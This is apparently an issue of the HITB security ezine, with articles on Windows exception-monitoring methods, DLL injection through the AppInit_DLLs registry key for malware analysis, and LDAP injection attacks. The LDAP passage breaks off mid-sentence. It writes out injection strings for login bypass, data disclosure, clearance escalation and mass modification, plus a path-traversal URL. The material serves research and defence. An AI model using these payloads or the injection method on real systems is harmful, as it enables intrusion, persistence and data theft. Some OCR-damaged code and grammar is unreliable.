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HITB Magazine 

Editorial 

Dear Reader, 

Welcome to 201 0 and to our newly 'reborn' HITB ezine! As 
some of you may know, we've previously had an ezine that 
used to be published monthly, however the birth of the HIT- 
BSecConf conference series has kept us too busy to continue 
working on it. Until now that is... 

As with our conference series, the main purpose of this new 
format ezine is to provide security researchers a technical 
outlet for them to share their knowledge with the security 
community. We want these researchers to gain further recog- 
nition for their hard work and we have no doubt the security 
community will find the material beneficial to them. 

We have decided to make the ezine available for free in the 
continued spirit of HITB in "Keeping Knowledge Free". In addi- 
tion to the freely available PDF downloads, combined editions 
of the magazine will be printed in limited quantities for distri- 
bution at the various HITBSecConf's around the world - Dubai, 
Amsterdam and Malaysia. We aim to only print somewhere 
between 1 00 or 200 copies (maybe less) per conference so be 
sure to grab a copy when they come out! 

As always we are constantly looking for new material as well 
as suggestions and ideas on how to improve the ezine, so if 
you would like to contribute or if you have a suggestion to 
send over, we're all ears :) 
Happy New Year once again and we hope you enjoy the zine! 



Zarul Shahrin 
Editor-in-Chief, 
zarulshahrin@hackinthebox.org 
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Exception Detection on Windows 

By Gynvael Coldwind, HISPASEC 



Vulnerability researchers use various techniques 
for finding vulnerabilities, including source code 
analysis, machine code reverse engineering and 
analysis, input data protocol or format analysis, input 
data fuzzing, etc. In case the researcher passes input 
data to the analyzed product, he needs to observe 
the execution flow in search of potential anomalies. In 
some cases, such anomalies can lead to a fault, conse- 
quently throwing an exception. This makes exceptions 
the most observable symptoms of unexpected, caused 
by malformed input, program behavior, especially if 
the exception is not handled by the application, and a 
JIT-debugger or Dr. Watson 1 is launched. 

Acknowledging this behavior, the researcher might 
want to monitor exceptions in a given application. 
This is easy if the exceptions are not handled, but it 
gets more complicated if the application handles the 
exception quietly, especially if anti-debugging meth- 
ods are involved. 

This article covers several possible ways of detect- 
ing exceptions, and briefly describes an open source 
kernel-level exception detection tool called ExcpHook. 

Exception detection methods 

Several exception detection methods are available on 
Windows, including the usage of user-mode debug- 
ger API, as well as some more invasive methods like 
registering an exception handler in the context of the 
monitored process, hooking the user-mode exception 
dispatcher, or using kernel-mode methods, such as 
interrupt service routine hooks or kernel-mode excep- 
tion dispatcher hooks. Each method has its pros and 
cons, and each method is implemented in a different 
way. The rest of this article is focused on describing 
the selected methods. 

Debugger API 

The most straightforward method of exception de- 
tection relies on the Windows debugger API and it's 
architecture, which ensures that a debugger attached 
to a process will receive information about every 
exception thrown in its context (once or even twice, 



in case the application does not handle the exception 
after having a chance to do so). 

A big advantage of this method, is that it uses the 
official API, which makes it compatible with most, if 
not all, Windows versions. Additionally, the API is well 
documented and rather trivial to use - a simple excep- 
tion monitor requires only a small debugger loop with 
only a few debug events handled. 

However, some closed-source, mostly proprietary, 
software contains anti reverse-engineering tricks 2 , 
which quite often include denial of execution tech- 
niques, in case an attached debugger is detected, 
which makes this approach loose it's simplicity, 
hence anti-debugger-detection methods must be 
implemented. 

Additionally, a debugger is attached to either a run- 
ning process, or a process that it spawns. To achieve 
ease of usage, the monitor should probably monitor 
any spawned process of a given class (that is, from 
a given executable file), which requires additional 
methods to be implemented to monitor the process 
creation 3 , which decreases the simplicity by yet an- 
other degree. 

Remote exception handler 

A more invasive method - however, still using only 
documented API - is to create an exception handler in 
the context of the monitored process. The easiest way 
to achieve this, is loading a DLL into the context of the 
monitored process (a common method of doing this 
includes calling OpenProcess and CreateRemoteTh- 
read with LoadLibrary as the thread procedure, and 
the DLL name, placed in the remote process memory, 
as the thread procedure parameter), and setting up 
different kind of exception handlers. 

On Microsoft Windows, there are two different 
exception handling mechanisms: Structured Excep- 
tion Handling 45 with the Unhandled Exception Filter 6 , 
and Vectored Exception Handling 7 (introduced in 
Windows XP). 

Structured Exception Handling, commonly abbrevi- 
ated to SEH, is used mostly as a stack-frame member 
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(which makes it a great way to exploit buffer over- 
flows by the way 8 ) and if used, is commonly changed 
(since every function sets its own exception handler). 
At the architectural level, SEH is an one-way list of 
exception handlers. If non of the exception handlers 
from the list manages to handle the exception, then 
an unhandled exception filter routine (which may be 
set using the SetUnhandledExceptionFilter function) 
is called. To allow stack-frame integration, the SEH was 
designed to be per-thread. 

The other mechanism is Vectored Exception Han- 
dling, which is a global (affects all threads present 
in the process) array of exception handlers, always 
called prior to the SEH handlers. When adding a VEH 
handler, the caller can decide whether to add it at the 
beginning or the end of the vector. 

There are two downfalls of this method. First of all, 
creating a new thread and loading a new module 
in the context of another application is a very noisy 
event, which is easily detected by the anti-debugging 
methods, if such are implied. As for the second thing, 
keeping the exception handlers both registered and 
placed first in a row might be a very hard task to 
achieve, especially since SEH handlers are registered 
per-thread and tend to change quite often, and if a 
VEH handler is registered, it could jump in front of the 
handler registered by the monitor. Additionally, this 
may change the flow of the process execution, mak- 
ing the measurements inaccurate. 

To summarize, this method is neither easy to code, 
nor quiet. 

KiUserExceptionDispatcher 

The previous method sounded quite promising, 
but the high-level exception API was not good for 
monitoring purposes. Let's take a look at a lower, but 
still user mode, level of the exception mechanisms on 
Microsoft Windows. 

The first function executed in user mode after an 
exception takes place, is KiUserExceptionDispatcher 9 
from the NTDLL.DLL module (it's one of a very few 10 
user-mode functions called directly from kernel 
mode). The name describes this function well: it's a 
user-land exception dispatcher, responsible for invok- 
ing both the VEH and SEH exception handlers, as well 
as the SEH unhandled exception filter function. 

Inline-hooking this function would allow the moni- 
tor to gain knowledge about an exception before it is 
handled. This could be done by loading a DLL into the 
desired process, overwriting the first few bytes of the 



routine with an arbitrary jump, and eventually, return- 
ing to the original KiUserExceptionDispatcher (leaving 
the environment in an unchanged form, of course). 

This method is quite easy to implement, and quite 
powerful at the same time. However, it is still easy 
to detect, hence inline-hooking leaves a very visible 
mark. Also, as stated before, creating a remote thread 
and loading a DLL is a noisy task, which could alert 
anti-debugging mechanisms. 

Additionally, just like both previous methods, this 
still has to be done per-process, which is not really 
comfortable if one wants to monitor a whole class of 
processes. But, if compared to the previous method, 
it's a step forward. 

Interrupt handler hooking 

Another approach to exception monitoring is to 
monitor CPU interrupts in kernel mode. 

As one may know, after an exception condition 
is met, an interrupt is generated, which causes a 
handler registered in the Interrupt DescriptorTable 
to be called. The handler can be either an interrupt 
gate, trap gate or task gate 11 , but in case of Windows 
exceptions it's typically an interrupt gate which points 
to a specific Interrupt Service Routine, that routes the 
execution to the exception dispatcher. 

An exception monitor could hook the exceptions' 
ISR by overwriting entries in the IDT 12 . This approach 
allows the monitor to remain undetected by standard 
methods used for debugger detection in user land, 
and at the same time is system-wide, making it pos- 
sible to monitor all processes of a given class (includ- 
ing kernel-mode exceptions, if desired). Additionally, 
the author can decide which exceptions are worth 
monitoring, and which not. 

However, at ISR level, the function does not have 
any easily accessible information about the processes 
that generated the exception, nor does it have pre- 
pared data about the exception. Additionally, patch- 
ing the IDT would alert PatchGuard, leading to a Blue 
Screen of Death in newer Windows versions. 

KiDispatchException 

Following the execution flow of ISR, one will finally 
reach the KiDispatchException routine 13 . This func- 
tion can be thought of as a kernel-mode equivalent 
of KiUserExceptionDispatcher - it decides what to do 
with an exception, and who should get notified of it. 
This means that, every generated exception will pass 
throught this function, which is very convenient for 
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the monitoring purposes. Additionally, KiDispatchEx- 
ception receives all the interesting details about the 
exception and the context of the application in the 
form of two structures passed in function arguments: 
EXCEPTION_RECORD 14 and KTRAP_FRAME 15 . The third 
parameter of this function is the FirstChange flag 
(hence the KiDispatchException is called twice, same 
way as the debugger, before exception handling, and 
if the exception was not handled). 

Inline-hooking this function allows both monitoring 
the exceptions in a system-wide manner and easily 
accessing all the important data about the exception 
and the faulty process. 

There are two downfalls of this method. First of all, 
the KiDispatchException function is not exported, so, 
there is no documented way of acquiring this func- 
tions address. The second problem is similar as in the 
IDT hooking case - the PatchGuard on newer systems 
will be triggered if this function is inline-hooked. 

ExcpHook 

An open source exception monitor for Windows XP, 
ExcpHook (available at http://gynvael.coldwind.pl/ 
in the "Tools" section), can be used as an example 
of a KiDispatchException inline-hooking exception 
monitor. 

At the architectural level, the monitor is divided into 
two parts: the user-land part, and the kernel-mode 



u 



driver. Executing the user-land executable results 
in the driver to be registered and loaded. The driver 
creates a device called WAExcpHook, which is used 
to communicate between the user-mode application 
and the driver. When the user-land application con- 
nects to the driver, KiDispatchException is rerouted to 
MyKiDispatchException - a function which saves the 
incoming exceptions to a buffer, that is later trans- 
ferred to the user mode. Apart from the exception 
information and CPU register contents, also 64 bytes 
of stack, 256 bytes of code (these numbers are de- 
fined by the ESP_BUFFER_SIZE and EIP_BUFFER_SIZE 
constants), the image name taken from EPROCESS 
and the process ID are stored in the buffer. 

In order to find the KiDispatchException function, 
ExcpHook (in the current version) uses simple sig- 
nature scanning of the kernel image memory. This 
however can also be done by acquiring the address of 
the dispatcher from the PDB symbol files available on 
the Microsoft web site, or by tracing the code of one 
of the KiDispatchException parents (e.g. ISR routines). 

The user-land code is responsible for filtering this 
information (i.e. checking if the exception is related 
to a monitored class of processes), acquiring more 
information about the process (e.g. exact image 
path) and displaying this information to the user. For 
the purpose of disassembling the code diStorm64 16 
library is used. 



Exception detected 

PID: 2092 First Chance : YES 

Exception code: 10000004 <KI_EXCEPTION_ACCESS_UIOLATION> 
Exception addr: 0040130a 

Image <from OpenProcess > : e:\hitb\excp_accuiol-c.exe 
Image Cfrom EPROCESS > : excp_accuiol.c - 
Param count : 2 
Papains : 

00000000 88776655 
Access Uiolation Type : READ 
Accessed Memory Address: 88776655 

Eax: 00401360 Edx: 77c51ae8 Ecx: 00401360 Ebx: 00004000 
|si: 7c90elfe Edi: 0006al9c Esp: 0022ff60 Ebp: 0022ff78 
Eip: 0040130a 
EFlags: 00010247 

CF: 1 PF: 1 AF: 0 ZF: 1 SF: 0 TF: 0 

IF: 1 DF: 0 OF: 0 NT: 0 RF : 1 UM: 0 

AC: 0 ID: 0 

IOPL: 0 UIF: 0 UIP: 0 

Stack: 

77c2aead 0006al9c 003e2bl0 00401305 00000010 00000002 0022ffb0 00401237 
00000001 003e2470 003e2bl0 00404000 0022ffa4 ffffffff 0022ffa8 00000000 

Code: 

[0040130a] al 55667788 MOU EAX, [0x88776655] 

[0040130f] 8945 fc MOU [EBP-0x4], EAX 

[00401312] b8 00000000 MOU EAX, 0x0 
I [00401317] c9 LEAUE 
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When executed without parameters, ExcpHook will 
display information about all user-land exceptions 
thrown. If a substring of the process name is given, 
it will display the information only about exceptions 
generated by the processes that contain a given sub- 
string it their image name. 

Since ExcpHook is open source (BSD-style license), it 
can be integrated into any fuzzing engine a researcher 
desires. 



Summary 

Microsoft Windows exception flow architecture allows 
an exception monitor to use quite a few different 
approaches and methods. Both user and kernel mode 
methods are interesting, and all of them have differ- 
ent pros and cons. No single method can be con- 
sidered best, but the three most useful methods are 
KiDispatchException hooking, KiUserExceptionDis- 
patcher hooking, and using the debugger API. Happy 
vulnerability hunting! • 
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The Art of DLL Injection 

By Christian Wojner, IT-Security Analyst at CERT.at 



Microsoft Windows sometimes really makes 
people wonder why specific functionalities, 
especially those making the system more 
vulnerable than it had to be, made (and still make) it 
into shelves. 

One of these for sure is the native ability to inject 
DLLs into processes by default. What I'm talking about 
is the registry-key "Applnit_DLLs". Well, though I'm 
aware of the fact that this is nothing new for the pros 
out there I guess most of you haven't tried it or even 
thought about using it productively in a malware 
analysis lab. The reasons for that reach from concerns 
about collateral damage like performance and stabil- 
ity issues as well as to some type of aversion to it's 
kind of primitive and therefore "less geeky" way to 
do hacks like DLL-injection. However, playing around 
with it in theory and praxis definitely has it's wow 
factors. 

About 

So let's take a closer look at the magic wand I am 
talking about. It's all about the registry key "HKLM\ 
Software\Microsoft\Windows NT\CurrentVersion\Win- 
dows\Applnit_DLLs" (which we will refer as APPINIT in 
this article). It was first intrduced in Windows NT and 
gave one the possibility to declare one (or even more 
using blanks or commas as separator) DLL(s) that 
should be loaded into (nearly) all processes at their 
creation time. This is done by the use of the function 
LoadLibraryO during the call of DLL_PROCESS_AT- 
TACH of // User32.dll"'s DIIMain. Unfortunately not 
*every* process imports functionalities oPUser32.dll" 
but *most* of them do, so you have to keep in mind 
that there's always a chance for it to miss something. 

Benefits 

However, the first benefit you gain by the use of 
APPINIT is based on its fundamental concept. By 
writing log-entries during the attach and detach 
calls of your APPINIT-DLL (DLL_PROCESS_ATTACH, 
DLL_PROCESS_DETACH, DLL_THREAD_ATTACH and 



DLL_THREAD_DETACH) you will get a decent over- 
view and feeling for the things going on under the 
hood of Windows, especially at boot-time (depending 
on "User32.dll"'s first load). I'd also recommend that 
you gather the commandline of each process your 
DLL is being attached to (DLL_PROCESS_ATTACH) 
by GetCommandLineO as it will reveal some more 
secrets. In my malware analysis lab I actually have the 
following informations per log-entry which perfectly 
fulfilled my needs for now: 

*Timestamp 

* Instance (hinstDLL of DIIMain) 

* Calltype (fdwReason of DIIMain) 

* Current Process-ID (GetCurrentProcessldO) 

* Current Thread-ID (GetCurrentThreadldO) 

* Modulefilename (GetModuleFileName(...)) 

* Commandline (in case of DLL_PROCESS_ATTACH) 

Having satisfied some yells about clarity regard- 
ing system-activities this way, there are a lot more 
use-cases for APPINIT. Let's focus on malware behav- 
ioural analysis now. As it's sometimes hard to trace 
malware that injects itself "somewhere" in the system 
our APPINIT-logging (as described above) will already 
do the job for us. As it will show every process our AP- 
PINIT-DLL gets attached/detached to/from, the same 
applies to the life-cycle of these processes'threads 
which will leave a very transparent trace of footprints 
of the executed malware (or process). 

Regarding the things you'd like to do or analyze 
it might be also of interest for you to have pointed 
out *when* your APPINIT-DLL is loaded into a newly 
created process. As already mentioned it is"User32. 
dll" which is responsible for loading your APPINIT-DLL. 
This means that your APPINIT-DLL and therefore any 
code you like will be loaded *before* (disregarding 
TLS-callbacks and according techniques) the malware 
functionality. In addition to that I also have to point 
out that at this point your code is already running at 
the memory scope of the malware (or executable) 
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you like to analyze. So monitoring and any type of 
shoulder-surfing based on the memory(-activity) (and 
so on) of the regarding process should be quite easy 
and stable. The only thing to care about is to restrict 
these obvious performance-related activities to the 
specific process. 

Taking this into account it might be useful to pro- 
grammatically give your APPINIT-DLL the ability to 
act as a kind of needle threader and run some special 
code under special circumstances (i.e. depending on 
the modules filename). I have put this ability in my 
lab's APPINIT-DLL but tried to keep it generic for the 
future by loading another special DLL under those de- 
scribed special circumstances. Furthermore my imple- 
mentation comes up with the optional possibilities to 
firstly have some code running serialized at the DLL's 
INIT and secondly have some code running in parallel 
(through threads) after that to keep the execution of 
my code persistent. 

Detection 

As there's always an arms race between white-hats 
and black-hats for the actual topic I have to admit that 
it's just the same. Of course it is possible to detect a 
foreign DLL being around or to read out the appropri- 
ate registry key. So there could already exist a mal- 
ware that detects this approach. But I won't speculate 
- at least I haven't analyzed a malware that reacted to 
this circumstances, yet. 

Installation/Deinstallation 

Let's see what it takes to get an APPINIT-DLL installed. 
You only have to set the value of the registry key 
"HKLM\Software\Microsoft\Windows NTXCurrentVer- 
sion\Windows\Applnit_DLLs"to your APPINIT-DLL's 
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full qualified path (or add it separated with blanks 
or commas if there already is one). You can do this in 
any way you like as long as you have the permissions 
to do so, but as we're talking about malware analysis 
labs I assume that you have them. 

NOTE: According to Microsoft since Windows Vista 
you also have to set the key "LoadApplnit_DLLs" (under 
the same location) to 1 to enable the APPINIT feature. 
Since Windows 7 there's another lever that has to be 
pulled to achieve the known functionality. You have to 
set the key"RequireSignedApplnit_DLLs"to 0, other- 
wise you'd be restricted to use signed DLLs only. 

After that you just have to reboot your machine and 
your APPINIT-DLL should be up and running. 

To get rid of your "enhancement" again you just 
have to remove it from the well known registry key 
and another reboot will do the commit. 

Drawbacks? 

None at all. As long as you do not allocate unneces- 
sary memory or have some endless or long running 
loops in the serial INIT calls there shouldn't be any 
recognizable impact. 

Epilogue 

Now that you have seen how mighty this little registry 
key can be I guess that you already have your ideas. 
And if not, at least keep it in mind for the case you see 
it being written by some application, that application 
might not be what it's supposed to be. 

For those of you that don't like to code feel free to 
download and use my implementation of an APPINIT- 
DLL on your own risk: 

http://wwwMrray51xom/static/downloads/appinitzip 
(The log file is written to user-temp named appinit.txt) • 
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LDAP Injection Attack and Defence Techniques 

LDAP (Lightweight Directory Access Protocol) is an application protocol that allows managing directory services. 
This protocol is used in several applications so it is important to know about the security involved around it. The 
objective of this article is not to provide an extensive explanation of the protocol itself but to show different at- 
tacks related to LDAP Injection and possible ways prevention techniques. 



By Esteban Guillardoy (eguillardoy@ribadeohacklab.com.ar), Facundo de Guzman (fdeguzman@ribadeohacklab.com.ar), 
Hernan Abbamonte (habbamonte@ribadeohacklab.com.ar) 



A directory service is simply the software system 
that stores, organizes and provides access to in- 
formation in a directory. Based on X.500 specifi- 
cation, the Directory is a collection of open systems 
cooperating to provide directory services. A directory 
user accesses the Directory through a client (or Direc- 
tory User Agent (DUA)). The client, on behalf of the 
directory user, interacts with one or more servers (or 
Directory System Agents (DSA)). Clients interact with 
servers using a directory access protocol. 1 

LDAP provides access to distributed directory 
services that act in accordance with X.500 data and 
service models. These protocol elements are based 
on those described in the X.500 Directory Access 
Protocol (DAP). Nowadays, many applications use 
LDAP queries with different purposes. Usually, direc- 
tory services store information like users, applica- 
tions, files, printers and other resources accessible 
from the network. Furthermore, this technology is 
also expanding to single sign on and identity man- 
agement applications. As LDAP defines a standard 
method for accessing and updating information in 
a directory, a person trying to gain access to sensi- 
tive information stored on a directory will try to use 
an input-validation based attack known as LDAP 
Injection. This technique is based on entering a mal- 
formed input on a form that is used for building the 
LDAP query in order to change the semantic mean- 
ing of the query executed on the server. By doing 
this, it is possible for example, to bypass a login form 
or retrieve sensitive information from a directory 
with restricted access. 

Some of the most well known LDAP implementa- 
tions include OpenLDAP 2 , Microsoft Active Directory 3 , 



Novell eDirectory and IBMTivoli Directory Server. 
Each of them may handle some LDAP search requests 
in a different way, yet regarding security, besides the 
LDAP server configuration, it is of capital importance 
all the applications making use of the LDAP server. 
These applications often receive some kind of user in- 
put that may be used to perform a request. If this user 
input is not correctly handled it could lead to security 
issues resulting in information disclosure, information 
alteration, etc. Commonly, LDAP injection attacks are 
performed against web apps, but of course you may 
find some other desktop applications making use of 
LDAP protocol. 

LDAP Query - String Search Criteria 
LDAP Injection attacks are based on generating a user 
input that modifies the filtering criteria of the LDAP 
query. It is important to understand how these filters 
are formed. 

RFC 451 5 specifies the string representation of 
search filters which are syntactically correct on LDAP 
queries 4 . The Lightweight Directory Access Protocol 
(LDAP) defines a network representation of a search 
filter transmitted to an LDAP server. Some applica- 
tions may find it useful to have a common way of 
representing these search filters in a human-readable 
form; LDAP URLs are an example of such application. 

Search filters have the following form: 

Attribute Operator Value 

The string representation of an LDAP search filter is 
defined by the succeeding grammar, using the ABNF 
notation. 
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filter 




" P f iltercomp ") " 


f iltercomp 


_ 


and / or / not / item 


and 


_ 


filterlist 


or 


_ 


" |" filterlist 


not 




"I" filter 


f i 1 ter 1 i s t 




l*f ilter 


item 




simple / present / 


substring 


/ 


extensible 


s i mp 1 e 




r t" t" t f i Itert vdp va 1 np 


f iltertype 


= 


equal / approx / greater 


/ less 






equal 




\> rr 


approx 




\\ ^ 


greater 




w ^> // 


less 




\\ ^ 


present 




attr "=*" 


substring 




attr [initial] any 


[final] 






initial 




value 


any 




* (value "*") 


final 




value 



As it is seen on the grammar, simple conditions can 
be combined using AND (&), OR (|) and NOT (!) opera- 
tors, which must be between brackets. 

The special character"*" matches one or more char- 
acters on a filter string. 

A few examples of this notation 

(cn=Babs Jensen) 
( ! (cn=Tim Howes) ) 

( & (ob j ectClass=Person) (| (sn=Jensen) 
(cn=Babs J*) ) ) 
( o=un i v * o f * mi ch * ) 

LDAP Injection 

LDAP Injection attack is just another kind of injection 
attacks. Basically, the idea behind this technique is to 
take advantage of an application that is not handling 
input values correctly. This can be achieved by send- 
ing some carefully crafted data to generate a LDAP 
query of our choice. When the application uses this 
user supplied values to build a LDAP query without 
prior validation or sanitizing, the attacker may force 
the execution of a statement by altering the construc- 
tion of the LDAP query. Notice that once the attacker 
alters the statement, by adding arbitrary code, the 
process will run with the same privileges of a valid 
query. This is a mayor security risk issue that must be 
eradicated. 5 ' 6 ' 7 



LDAP injection attacks are commonly used against 
web applications. They could also be applied to any 
application that has some kind of input used to per- 
form LDAP queries. 

Depending on the target application implementa- 
tion one could try to achieve: 

• Login bypass 

• Information disclosure 

• Priviledge escalation 

• Information alteration 

Along the article, all these items will be discussed 
in detail. Do notice that some of these attacks could 
be handled in a different way depending on the LDAP 
server implementation due to different search filter 
interpretation in each of them. 

Login Bypass 

An LDAP repository is normally used to validate cre- 
dentials. Basically, two simple ways to implement an 
authentication using LDAP can be distinguished: 

• to use"bind"function or method to connect to 
the LDAP server. 

• using an LDAP search query against the LDAP re- 
pository checking username and password fields. 

Bind Method 

This authentication method cannot be bypassed eas- 
ily but, depending on the application logic, one could 
end up with an anonymous bind. 

This is a sample code you could find in a web ap- 
plication using a bind method 8 : 



<?php 

$ldapuser 

$ldappass 



= $_GET [ 'username' ] ; 
$_GET[ 'password' ] ; 



$ldapconn = ldap_connect ("ldap . serv- 
er . com") 

or die ("Could not connect to serv- 
er") ; 

if ( $ldapconn) { 

$ldapbind = ldap_bind ( $ldapconn , 
$ldapuser r $ldappass) ; 

if (! $ldapbind) { 

$ldapbind = ldap_ 
bind ( $ldapconn) ; 



} 



} 

?> 
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This code tries to perform a bind using the user- 
name and password provided. If that is not successful 
it ends with an anonymous bind. 

This could be useful because if LDAP server security 
is not correctly configured an anonymous connection 
could be enough to obtain information with the other 
LDAP injection techniques discussed later on this 
section. 

Search Query 

This kind of authentication is similar to the one any 
programmer should use with a standard database 
storing username and password information. The 
application will run a query to determine if username 
and password hash are correct. 

An LDAP search query to accomplish this could be 
something like this: 

(& (Username=user ) ( Password=passwd) ) 

If the username and password values are not 
checked before using them in a search like the one 
above, we could insert particular values to alter the 
final query. 

For example, we could enter this text in the user- 
name field: "user)(&))(" and anything in the password 
field just in case it validates for empty field. This will 
produce the following query: 

(& (Username=user ) (&) ) ( ( Password=z z ) ) 

Note that this query will always be true even with 
invalid passwords. 

We could try different variations of the example 
used here because the search query could be written 
using single or double quotes. Consequently, one 
could try with these inputs: 

A ) (Username=' validUsername ' ) (&)) ( 
V) (Username=\ 1 validUsername\ 1 ) (&)) ( 
xs ) (Username="validUsername") (&)) ( 
\") (Username=\"validUsername\") (&)) ( 

In this case, the attribute named Username is 
guessed since it is a very common attribute name. 

Information Disclosure 

It is important for an attacker to get familiar with the 
existing structure in a company. Every bit of infor- 
mation available can aid strangers on their quest to 
attack a potential target. If the developer of a web 



application is not careful enough, simple applications 
can be twisted to obtain critical data. 

Depending on the internal LDAP query an appli- 
cation is using an attacker could alter it resulting in 
another LDAP query with more information. 

Supposing an application is using a filter with an OR 
condition like: 

( | (obj ectClass=device) 
(name=parameterl ) ) 

If the parameter supplied was as following: 

"test) (objectClass=*" 

the resulting query would be: 

( | (obj ectClass=device) (name=test ) 
(ob j ectClass=* ) ) 

This is a totally valid query but it is showing all ob- 
ject classes and not just the devices. 

The same can be achieved if the application uses an 
AND condition instead of OR. 

The filters above have a valid syntax, but if the ap- 
plication is not checking the final filter the attacker 
could try to create more that one filter in a single 
string. If this is sent to the LDAP Server, depending on 
the implementation the server could parse the string 
and take only the first complete and valid filter ignor- 
ing the rest. 

For example, if the application internally uses a filter 
like: 

(& (attrl=userValue) 
(obj ectClass=device) ) 

And the userValue is set to 

test) (objectClass=*) ) (&(1=1 

it will generate a final filter like: 

(& (attrl=test) (ob j ectClass=* ) ) (&(1 = 1) 
(obj ectClass=device) ) 

This string has 2 filters and each one of them by 
separate is valid. The LDAP server would then inter- 
pret the first filter (which is the one with the object- 
Class injected condition) and ignore the second one. 
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When performing this kind of attacks you can 
always try with some common LDAP attribute names 
like objectClass, objectCategory, etc. 

Charset Reduction 

The objective of this technique is to enable the attack- 
er to determine valid characters that form the value 
of a given object property. The purpose is to take 
advantage of the LDAP query wildcards to construct 
queries with them and random characters. Each time 
a query guess is run, if the query is successful (mean- 
ing that some information is retrieved) a part of the 
property value will be revealed to the attacker. After 
a finite number of successful guesses, an attacker will 
be in a position to guess the complete value (or at 
least to iterate between the character matches to find 
the correct order). 

Supposing the target is' http://ribadeohacklab.com. 
ar/peop\e_search.aspyd. By looking at the search page it 
was possible to determine that the LDAP objects being 
query have a'last_name'/name'/address'/telephone' 
and a hidden 'zone' property (that was disclosed using 
one of the above techniques). By default the applica- 
tion is meant to give person details only from the 
'public' zone. How could this limit be bypassed? 

The following query is successful: 

http : / / ribadeohacklab . com . ar /people_ 
search . aspx?name= John) ( zone=public) 

Assuming that a 'John' is also part of a different zone 
we need to find a reasonable amount of characters 
to make a guess about a zone name. First thing to do 
is try to guess the first character of a different zone. 
Using the '*' wildcard one could try to see if a zone 
begins with the character'b': 

http : / / ribadeohacklab . com . ar /people_ 
search . aspx?name=Peter ) ( zone=b* ) 

This doesn't retrieve any results. After several at- 
tempts the following query: 

http : / / ribadeohacklab . com . ar /people_ 
search . aspx?name=Peter ) ( zone=m* ) 

Shows the following results: 

name : John 
last name: Doe 



address: Fake Street 123 
telephone : 1234-12345 

At this moment there are several choices. One could 
try to find the next character (like 'mo*'if a vowel is 
present in the zone (like 'm*i*'), etc. After some trial 
and error attempts the desired result is achieved: 

http : // ribadeohacklab . com . ar /people_ 
search . aspx?name=Peter ) ( zone=main) 

It would be easy to use the value just found to gain 
further insight about the information stored. 

This technique may look as a brute force approach, but 
the great advantage here is that every query will give 
the attacker a partial knowledge of the successful value 
string. An automated attack would be able to guess 
values without too much difficulty and if the attacker is 
clever, he could minimize the amount of queries needed 
to find a given value. For example, it would be possible 
to use a dictionary of words of a particular domain (like 
people names) to make a decision tree and then use it to 
run a wordlist attack using the wildcards. 

Privilege Escalation 

To clarify, when speaking of a privilege elevation 
attack through LDAP injection, it is meant a change 
of privilege in the authentication structure repre- 
sented by a schema stored in a LDAP database. In this 
particular case, the objects should have some kind of 
property that determines the access or security level 
required to work with them. 

Taking for example a product order repository lo- 
cated in the 'Sales' server, where not all users are able 
to see all the product orders, if the default query is: 

(& (category=latest ) (clearance=none) 

only the following would be seen: 

http : / / sales . ourdomain/ orders . 
php?category=latest 

Order A, Amount = 1000, Salesman = 
"John Doe" 

Order C, Amount = 700, Salesman = 
"Jane Doe" 
Order E, ... 

Just by looking at the result set, it is plausible that 
something may be missing. So finding a higher 
'clearance' level (just using a '*' wildcard or by 'Charset 
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Reduction', see supra) would be enough to access the 
missing information. 

In the current example, the higher clearance level 
found is 'confidential' so if the application is vulner- 
able to injection, it is easy enough to use it in order to 
gain access to the remaining product orders. 

Therefore: 

http : / / sales . ourdomain/ 
orders . php?category=latest ) 
( clear ance=conf identi al ) 
or 

http : / / sales . ourdomain/ orders . 
php?category=latest ) (clearance=^ ) 

show the following results: 

Order A, Amount = 1000, Salesman = 
"John Doe" 

Order C, Amount = 5000000, Salesman = 
"Joe Doakes" 

Order B, Amount = 700, Salesman = 
"Jane Doe" 

Order B, Amount = 1000000, Salesman = 
"Jannine Dee" 
Order D, . . . 

Even with such a rough example the security risk of 
disclosing personal information of the top tier sales- 
men of this company is clear. 

Information Alteration 

LDAP not only allows performing search operations, 
but also adding, modifying and deleting information. 

It is not uncommon to find organizations with 
different applications for managing directory data 
without having to connect to the directory server. 
These applications use APIs to interact via LDAP with 
the information stored in the directory. If an applica- 
tion gets user inputs via a form in order to alter some 
information on the directory, the attacker may modify 
this data to find out the way to generate an unexpect- 
ed result, like modifying or deleting more information 
than the expected. 

For example, PHP allows to modify data on a direc- 
tory by simply using a LDAP library function, ldap_ 
modifyO 8 . This function is defined as: 

bool ldap_modify ( resource $li , 
string $dn , array $entry ) ; 



where $li represents an LDAP link identifier, returned 
by ldap_connect() function, $dn is the distinguished 
name of the entry to be modified and $entry is the 
information to be modified. 

<?php 

$attr["cn"] = "ToModify"; 
$dn = "uid=Ribadeo, ou=People, dc= 
foo"; 

$result = ldap_modif y ( $ldapconn, 
$dn, $attr) ; 

if (TRUE === $result) { 

echo "Entry was modified."; 

} 

else { 

echo "Entry could not be 
modified . " ; 
} 

?> 

If the application receives $attr and $dn as parameter, 
and the attacker enters "uid=Ribadeo,ou=People,dc=*" 
as the $dn value, and if the input is not sanitized, all 
CN entries under the branch will be modified with the 
"ToModify" value. 

The same attack technique can be used on any 
function receiving the distinguished name as a user 
input provided value, like PHP function ldap_mod_re- 
place(), ldap_mod_del() or ldap_delete(). 

URL encoding & Unicode encoding 

Like with any other web application attack, one can 
always try the injections using URL encoding 910 , 
and Unicode encoding 11 . Sometimes the web server 
along with the web app may incorrectly interpret the 
characters provided. For example, in a path traversal 
attack some kind of encoding is frequently used. An 
attacker will try to put ".A" in the url to go to another 
directory, and this may be achieved using valid and/or 
invalid encoding like 

http: //example/ . .%255c. .%255c. .%255cb 
oot . ini 

The LDAP techniques mentioned here also heav- 
ily rely on the treatment given to the user input, and 
even if the application is performing some kind of 
check against it, using some character encoding the 
attacker may bypass this and get what he/she is look- 
ing for. 
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With the LDAP search syntax in mind, we can always 
try to use some kind of encoding on characters like 
( ) & I i = ~ * ' " 

LDAP Injection vs. SQL Injection 

Most applications nowadays use databases to store 
information. IT professionals have a deep knowledge of 
SQL not only because it is commonly used, but due to 
the fact that SQL is a declarative programming lan- 
guage in which you simply describe what the program 
should do but not how to accomplish it. Despite LDAP 
searches share characteristics of a declarative language, 
it is not as widely known by IT professionals as SQL is. 

Sometimes, in order to avoid working with LDAP 
searches directly, some steps are performed to dele- 
gate query logic on a relational model instead of using 
a directory. Particularly, Windows Active Directory can 
be queried using SQL syntax by using Microsoft OLE DB 
Provider for Microsoft Active Directory Service 12 . This 
gives ADO applications the possibility to connect to 
heterogeneous directory services through ADSI, by cre- 
ating a read-only connection to the directory service. 

A common practice on Microsoft environments is to 
use this OLE DB Provider with SQL Server. In this case 
